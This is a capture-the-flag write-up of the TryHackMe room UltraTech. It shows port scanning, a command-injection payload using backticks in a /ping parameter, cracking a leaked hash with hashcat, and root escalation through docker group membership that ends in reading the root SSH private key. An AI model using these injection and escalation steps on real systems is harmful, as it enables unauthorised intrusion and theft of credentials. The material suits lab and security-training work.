This is a write-up of the room UltraTech from TryHackMe.
Task 1: Deploy the machine
Deploy the machine by clicking deploy.
Task 2: Enumeration
Let’s scan the box by running
┌─[[email protected]]─[~/thm/ultratech]
└──╼ #nmap -sC -sV -p- $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-11 20:05 BST
PORT      STATE SERVICE VERSION
8081/tcp  open  http    Node.js Express framework
|_http-cors: HEAD GET POST PUT DELETE PATCH
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
31331/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 15C1B7515662078EF4B5C724E2927A96
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: UltraTech - The best of technology (AI, FinTech, Big Data)
...
As you can see from the output, Node.js is running on port 8081. The other port in use is 31331, where there is an Apache server.
If we visit the page it shows:
When we use Burp Suite, we can see that it uses 2 routes:
http://10.10.27.184:8081/auth?login=user&password=password from the /partners.html page.
Task 3: Let the fun begin!
Let’s investigate the
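If we try http://10.10.27.184:8081/ping?ip=ls, we get
ping: ls: Temporary failure in name resolution.
But if we try http://10.10.27.184:8081/ping?ip=`ls`, we get
ping: utech.db.sqlite: Name or service not known
The backticks are shell command substitution: the server passes the ip parameter to a shell, which runs ls first and hands its output (the file name utech.db.sqlite) to ping as the host name. In other words, the route is vulnerable to command injection.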
To see the contents of the database, we can visit
We get the hash
If we run hashcat against the hash, it will reveal the password:
┌─[[email protected]]─[~/thm/ultratech]
└──╼ #hashcat hash /usr/share/wordlists/rockyou.txt
...
f357a0***************:n*******
We can now SSH into the room with user r00t.
Task 4: The Root of All Evil
We can now run linenum.sh to find ways of becoming root.
You can see from the output that we are part of the docker group, so we can run a command to try and escalate.
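We can run docker run -v /:/mnt --rm -it bash chroot /mnt sh. This will give us the root user: the Docker daemon runs as root, so a member of the docker group can have it mount the host's / into a container at /mnt and chroot into it. This is why membership of the docker group is equivalent to root access on the host.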
We can then run cat /root/.ssh/id_rsa to get the first 9 letters which gives us
That’s the room complete!